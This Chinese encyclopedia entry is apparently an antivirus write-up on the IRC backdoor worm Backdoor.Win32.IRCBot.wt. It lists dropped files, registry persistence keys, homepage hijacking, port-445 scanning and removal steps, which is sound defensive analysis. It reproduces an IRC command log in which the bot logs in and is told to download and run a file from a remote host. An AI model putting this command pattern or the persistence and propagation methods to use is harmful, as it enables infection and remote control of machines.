词条 | Backdoor.Win32.IRCBot.wt |
释义 | 该病毒运行后,衍生病毒文件到系统目录下,添加注册表自动运行项以随机引导病毒体。自动下载某文件以改动 IE 主页,创建大量线程用于扫描用户所在网络,若发现存在默认共享或弱口令则传播自身。此病毒为一个利用 Windows 平台下 IRC 协议的网络蠕虫,受感染用户可能会被操纵进行 Ddos 攻击、远程控制、发送垃圾邮件、创建本地 Tftp 等行为,由于大量消耗系统资源,病毒运行时间过长,将导致系统停止响应。 病毒信息病毒名称: Backdoor.Win32.IRCBot.wt 中文名称: IRC后门 病毒类型: 后门类 文件 MD5: 36288D10F5FC1B922386CA500DF010EB 公开范围: 完全公开 危害等级: 5 文件长度: 569,344 字节 感染系统: WinNT4以上系统 开发工具: Microsoft Visual C++ 6.0 命名对照: SOPHOS[W32/Rbot-GDD] 行为分析1 、衍生下列副本与文件: %System32%\\algose32.exe %Win$%\\hp.exe 此文件用以改变 IE 主页设置 2 、新建注册表键值: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\ Run\\Offices Monitorse Value: String: "C:\\WINDOWS\\System32\\algose32.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ Run\\Offices Monitorse Value: String: "C:\\WINDOWS\\System32\\algose32.exe" HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SessionManager\\ PendingFileRenameOperations Value: Type: REG_MULTI_SZ Length: 121 (0x79) bytes HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SessionManager\\ PendingFileRenameOperations Value: Type: REG_MULTI_SZ Length: 121 (0x79) bytes 3 、修改注册表键值: HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page New: String: "http://www.h*ti*f*link.com" Old: String: "about:blank" 修改下列注册表键值,用以标记已感染 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\EnableDCOM New: String: "N" Old: String: "Y" HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\restrictanonymous New: DWORD: 1 (0x1) Old: DWORD: 0 (0) HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\restrictanonymous New: DWORD: 1 (0x1) Old: DWORD: 0 (0) 4 、创建大量扫描线程用以扫描存在文件共享的目标主机。例如: Tcp LocalHosIPt:2207 DestHostIP:445 SYN_SENT Tcp LocalHosIPt:2207 DestHostIP:445 LISTENING ……………. 5 、IRC 服务端可响应下列命令: Join Nick Kick Part Quit Open [shell]: file opened: 6 、自动连接的 IRC 服务器: Tcp->Generic(8080) ServerIP:6*.1*9.28.1*0 7 、连接 IRC 服务器后进行如下操作: MODE [XP]|28094572 +n+B JOIN #!e! dark( 频道名称 ) :irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag :irc.foonet.com NOTICE [XP]|28094572 :BOTMOTD File not found :[XP]|28094572 MODE [XP]|28094572 :+B :[XP]|28094572!feicdnye@3D32CD61.A821492B.DAFC72B.IP JOIN :#!e! :irc.foonet.com 332 [XP]|28094572 #!e! :#advscan netapi 220 6 0 -r -b -s :irc.foonet.com 333 [XP]|28094572 #!e! x2 1175433849 :irc.foonet.com 353 [XP]|28094572 @ #!e! :[XP]|28094572 @x :irc.foonet.com 366 [XP]|28094572 #!e! :End of /NAMES list. :irc.foonet.com 302 [XP]|28094572 :[XP]|28094572=+feicdnye@2*2.1*1.7.2*3 :irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag :irc.foonet.com 302 [XP]|28094572 :[XP]|28094572=+feicdnye@2*2.1*1.7.2*3 :irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag :x!adanali@fbi.com PRIVMSG [XP]|28094572 :#login f**keremr3 :x!adanali@fbi.com PRIVMSG [XP]|28094572 :#sk4ni http://2*7.*8.1*2.1*2/~rocksont/hp.exe c:\\hp.exe 1 PRIVMSG x :[uRxBot]: Password Accepted. */ 下载 hp.exe 到目标目录,此文件用以改变 IE 主页设置 */ PRIVMSG x :[DOWNLOAD] 'http://2*7.*8.1*2.1*2/~rocksont/ hp.exe' to 'c:\\hp.exe' PRIVNSG x :[DOWNLOAD] OK ('http://2*7.*8.1*2.1*2/~rocksont/ hp.exe' to'c:\\hp.exe') PRIVMSG x :[DOWNLOAD] PROCESS CREATED ('c:\\hp.exe') :irc.foonet.com 421 [XP]|28094572 PRIVNSG :Unknown command 8 、改变后的主页为 http://www.h*ti*f*link.com/(2*8.9*.*3.1*1) 修改系统文件注: % System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。 Windows2000/NT 中默认的安装路径是 C:\\Winnt\\System32 , windows95/98/me 中默认的安装路径是 C:\\Windows\\System , windowsXP 中默认的安装路径是 C:\\Windows\\System32 。 -------------------------------------------------------------------------------- 清除方案1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 ) 2 、 手工清除请按照行为分析删除对应文件,恢复相关系统设置。 (1) 使用 安天木马防线结束下列进程: algose32.exe (2) 恢复病毒修改的注册表项目,删除病毒添加的注册表项。 HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\Run\\Offices Monitorse Value: String: "C:\\WINDOWS\\System32\\algose32.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run\\Offices Monitorse Value: String: "C:\\WINDOWS\\System32\\algose32.exe" HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ SessionManager\\PendingFileRenameOperations HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\EnableDCOM New: String: "N" Old: String: "Y" HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ Lsa\\restrictanonymous New: DWORD: 1 (0x1) Old: DWORD: 0 (0) HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ Lsa\\restrictanonymous New: DWORD: 1 (0x1) Old: DWORD: 0 (0) (3) 删除病毒释放文件 %System32%\\algose32.exe %Win$%\\hp.exe |
随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。